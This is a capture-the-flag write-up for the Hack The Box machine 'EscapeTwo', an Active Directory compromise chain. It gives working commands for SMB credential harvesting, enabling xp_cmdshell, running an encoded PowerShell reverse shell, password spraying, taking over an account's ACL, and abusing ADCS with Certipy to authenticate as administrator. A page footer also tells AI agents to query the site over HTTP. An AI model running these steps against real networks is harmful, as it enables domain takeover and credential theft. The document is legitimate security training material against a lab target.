# EscapeTwo AD

## Machine Information

The initial access was straightforward, as the machine's description provided a username and password. Using these credentials, further enumeration was performed with **crackmapexe** to discover additional users. File shares were also checked for readable content, leading to an **SMB share** that contained an **XLS file**. Upon inspection, the file held credentials for another user.

The most interesting service was **MSSQL**, which was leveraged using **Impacket** to extract configuration files, revealing another password. A **password spray attack** with **crackmapexe** helped identify the corresponding user.

For privilege escalation, the user had **Active Directory Rights Overwrite** privileges. By assigning **Ryan** to this privilege and using **Certipy**, administrative access was obtained, leading to full system compromise.

## Challenge Information

* **Name:** EscapeTwo
* **Platform:** Hack The Box (HTB)
* **Category:** Active Directory (Windows)
* **Difficulty:** Easy
* **Objective:** Exploit Active Directory to retrieve the flag.
* **Tags:** `smbclient`, `evil-winrm`, `certipy`
* **Key Exploit:** Active Directory Rights Overwrite

## Machine Information

* **IP Address:** `10.10.11.51`
* **Domain:** `sequel.htb`
* **Domain Controller:** `DC01.sequel.htb`
* **Initial Credentials:** `rose / KxEPkKe6R8su`

## **Enumeration**

### nmap

A full port scan was conducted to identify open services.

`nmap -sC -sV -p- 10.10.11.51`

Discovered Open Ports & Services:

<table><thead><tr><th width="260">Port</th><th width="259">Service</th><th width="334">Description</th></tr></thead><tbody><tr><td>53</td><td>DNS</td><td>Domain Name System</td></tr><tr><td>88</td><td>Kerberos</td><td>Authentication Service</td></tr><tr><td>135</td><td>RPC</td><td>Remote Procedure Call</td></tr><tr><td>139</td><td>NetBIOS</td><td>File Sharing Service</td></tr><tr><td>389</td><td>LDAP</td><td>Active Directory Queries</td></tr><tr><td>445</td><td>SMB</td><td>File Share Access</td></tr><tr><td>1433</td><td>MSSQL</td><td>Microsoft SQL Server 2019</td></tr><tr><td>5985</td><td>WinRM</td><td>Windows Remote Management</td></tr></tbody></table>

> Key Finding:&#x20;
>
> * The machine is part of an Active Directory domain: `sequel.htb`.
> * A Microsoft SQL Server 2019 instance is running.
> * SMB and LDAP services indicate potential credential leaks.

Before proceeding with enumeration and exploitation, add the target machine’s IP and domain name to `/etc/hosts` for easier interaction with services.

`echo "10.10.11.51 sequel.htb dc01.sequel.htb" | sudo tee -a /etc/hosts`

### Initial Access

The challenge description provided the initial credentials:

```
Username: rose  
Password: KxEPkKe6R8su 
```

Using `crackmapexec`, additional enumeration was performed.

```
nxc smb sequel.htb -u 'rose' -p 'KxEPkKe6R8su' --shares
```

<figure><img src="/files/IsUh45uhplaN5oPZZmcI" alt=""><figcaption><p>Shares file</p></figcaption></figure>

SMB Enumeration

The `Accounting Department` SMB share contained an **XLS file**, which was retrieved and analyzed.

```
smbclient \\sequel.htb\Accounting Department -U rose
mget *
```

![Snippet images of command and action](/files/lmzGXNQFuGJbhtT3cYsX)

By extracting the contents of the XLS file, additional credentials were discovered:

```
angela : 0fwz7Q4mSpurIt99  
oscar : 86LxLBMgEWaKUnBG  
kevin : Md9Wlq1E5bZnVDVo  
sa : MSSQLP@ssw0rd!
```

### Exploiting MSSQL for Shell Access

{% hint style="info" %}
According to the MS documentation, xp\_cmdshell spawns a Windows command shell and passes in a string for execution. Any output is returned as rows of text.&#x20;
{% endhint %}

`xp_cmdshell { 'command_string' } [ , NO_OUTPUT ]`

Using `impacket-mssqlclient`, a connection was established using the extracted `sa` credentials.

```
impacket-mssqlclient sa:"password"@sequel.htb
```

#### **Enabling xp\_cmdshell**

The `xp_cmdshell` feature was enabled to execute system commands.

```
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
```

#### Gaining a Reverse Shell

A PowerShell reverse shell was executed using **Nishang**.

![Nishang script being encoded](/files/uLvRH26P57Se9uXPFgXd)

With an active shell, further enumeration led to the discovery of **SQL2019 configuration files**, which contained plaintext credentials.

```
xp_cmdshell 'powershell -enc <<base64_payload>>'
```

![Getting a shell as sequel\sql\_svc](/files/BHvzvgHsNGR0Kgy6ky0b)

![List of dir with /SQL2019 as target](/files/WcIk7P6SOKs1pOOqbEf1)

![/SQL2019/ExpressAdv\_ENU file listing](/files/g7osGbZefiWYvwXTzC44)

![Snippet sql-configuration.ini](/files/hY7PNZnrhXVKL6bGCZGQ)

### Privilege Escalation – Active Directory Rights Overwrite

### Identifying New Credentials

After obtaining a new set of credentials, a password-spraying attack using `crackmapexec` identified the associated user:

![using net user to list all user in domain.](/files/zEvoC2NZ5prJ3bvO4G1c)

```
crackmapexec smb sequel.htb -u all_users.txt -p 'WqSZAF6CysDQbGb3'
```

![User Ryan was successfully authenticated.](/files/nawz9Gr2WsJeyRMVPz1z)

### Identifying Privileges

Using [**PowerView**](https://github.com/aniqfakhrul/powerview.py), Ryan’s privileges were examined:

![Snippet using Powerview with Get-DomainUser](/files/YBfSPHfb9K3G00lWRKO3)

```
Get-DomainUser -Identity ryan -Select ObjectSid
Get-DomainObjectAcl -ResolveGUIDs -SecurityIdentifier S-1-5-21-548670397-972687484-3496335370-1114
```

![result Get-DomainUser -Identity ryan -Select ObjectSid](/files/9xJLQcMnN1tF0Hz6G5tP)

![result Get-DomainObjectAcl -ResolveGUIDs -SecurityIdentifier \<SID>](/files/ZcUqJomnb8NBdI9ILLYg)

Ryan had **Active Directory Rights Overwrite** privileges, which allowed control over the `ca_svc` account.

### Assigning Ryan as Owner

Assign Ryan as ownership in `ca_svc` account.

```
Set-DomainObjectOwner -TargetIdentity ca_svc -PrincipalIdentity ryan
Add-DomainObjectAcl -TargetIdentity ca_svc -PrincipalIdentity ryan -Rights fullcontro
```

{% hint style="warning" %}
As clean-up script from the machine, need to re-run this step multiple times.
{% endhint %}

![the command being executed to assign ca\_svc ownership to Ryan.](/files/6lxialPjwIxKHAmn1gGI)

### Certificate-Based Authentication (Certipy)

With `ca_svc` access, **Certipy** was used to request a certificate for administrator authentication.

`certipy-ad shadow auto -u ryan@sequel.htb -p 'WqSZAF6CysDQbGb3' -dc-ip 10.10.11.51 -ns 10.10.11.51 -target dc01.sequel.htb -account ca_svc`

![error in clock skew](/files/k5ulm1v4OwqJXhQ1D4Hq)

{% hint style="danger" %}
Fix this using,&#x20;

in root term >> timedatectl set-ntp off; ntpdate {dc\_ip}
{% endhint %}

Re-run the ownership assignment:

![getting ca\_svc hash](/files/wd4qSfBroK8yoKhToyzp)

```
KRB5CCNAME=$PWD/ca_svc.ccache certipy-ad find -scheme ldap -k -debug -target dc01.sequel.htb -dc-ip 10.10.11.51 -vulnerable -stdout
KRB5CCNAME=$PWD/ca_svc.ccache certipy-ad template -k -template DunderMifflinAuthentication -target dc01.sequel.htb -dc-ip 10.10.11.51
```

![Finding vulnerable template from Kerberos](/files/EA0XUgBqQIZrQkZat4PS)

![Ensure ca\_svc cache in the template.](/files/lDs81nvVJGoG1usbBkvm)

### Requesting a Certificate for Administrator Access

`certipy-ad req -u ca_svc -hashes '3b181b914e7a9d5508ea1e20bc2b7fce' -ca sequel-DC01-CA -target sequel.htb -dc-ip 10.10.11.51 -template DunderMifflinAuthentication -upn administrator@sequel.htb -ns 10.10.11.51 -dns 10.10.11.51 -debug`

![result from command](/files/06C0kh58Uym4AgZXZjbB)

### Authenticating as Administrator

`certipy-ad auth -pfx ./administrator_10.pfx -dc-ip 10.10.11.51`

![Getting hash that will use to login.](/files/68MHrI0RtTWWC3Vpn6aj)

Using **Evil-WinRM**, administrator access was established:

`evilwinrm -i dc01.sequel.htb -i administrator -H {admin_hash}`

![result command](/files/yI4bIL7LzPkl9okaJ9HC)

## **Conclusion**

This machine demonstrated the importance of securing **Active Directory Certificate Services (ADCS)** and **MSSQL xp\_cmdshell**. Key takeaways:

1. **Avoid embedding plaintext credentials in files.**
2. **Restrict SMB access to authenticated and authorized users.**
3. **Disable unnecessary SQL Server features like xp\_cmdshell.**
4. **Monitor Active Directory rights assignments, especially over critical accounts.**

This was an engaging Active Directory exploitation challenge that emphasized **SMB enumeration, password spraying, SQL abuse, and AD certificate misconfigurations**.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ymiir.gitbook.io/nota/2025-stuff/machine-writeup/active-directory/escapetwo-ad.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
Port	Service	Description
53	DNS	Domain Name System
88	Kerberos	Authentication Service
135	RPC	Remote Procedure Call
139	NetBIOS	File Sharing Service
389	LDAP	Active Directory Queries
445	SMB	File Share Access
1433	MSSQL	Microsoft SQL Server 2019
5985	WinRM	Windows Remote Management